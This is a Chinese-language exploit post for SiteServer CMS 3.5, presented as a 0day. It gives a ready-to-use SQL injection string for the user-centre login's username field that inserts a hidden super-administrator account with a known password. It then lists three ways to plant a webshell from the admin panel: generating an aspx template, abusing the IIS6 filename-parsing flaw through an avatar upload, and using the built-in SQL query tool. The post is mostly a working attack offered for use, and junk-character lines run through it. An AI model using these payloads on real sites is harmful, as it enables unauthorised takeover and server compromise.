SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
7 R$ P8 M  f7 T- c- \' Y! g
* `9 Y" l9 H& o- {. q: z# gstieserver官网:www.siteserver.cn

* p, }0 r# J6 ]# f
" j: R% K/ G2 R/ k
EXP:
: H: a. y6 R1 `7 G
3 `# s5 k5 i: h; z! ]9 v) G直接访问UserCenter/login.aspx

" A" i9 _1 f  U* O( T- {$ j! P
3 X  O# b2 E/ t1 O
* r( L1 U/ z/ R' K用户名处输入：

# l6 a& n. t0 P) b4 \1 I: A123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

) k, X) r3 S  ~8 P
( o/ x: ]! \$ N: H4 V1 A/ x
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
. S- r' F4 J7 B, Y2 A: M3 G) O
# b2 m: b% b! E1 O2 I
0 c! W2 }/ @4 W1 R! g; {. v
之后再访问后台SiteServer/login.aspx用插入的用户登陆
" o, x; W" X- ]  x


后台拿webshell的三种方法：
( @# M9 H) B6 o! L
一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
6 F$ K7 A% l9 ]
二、
: L; o, q; [7 ~3 s
5 m) i0 ~2 Q* n+ I2 `成员权限-》添加用户-》用户名为：1.asp
6 g/ q  O4 l0 u
8 t. I& j. n! P' D! m( xhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

: C  ^, H  t4 V! r( _2 K（ps：后台添加用户时不会验证是否含有非法字符）

/ R2 Z; |' [0 C; b三、

系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

: y5 t0 o  b5 M" ~, T系统工具-》数据库工具-》SQL语句查询
- O% V$ h4 E) ^( v9 `# H4 Q这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。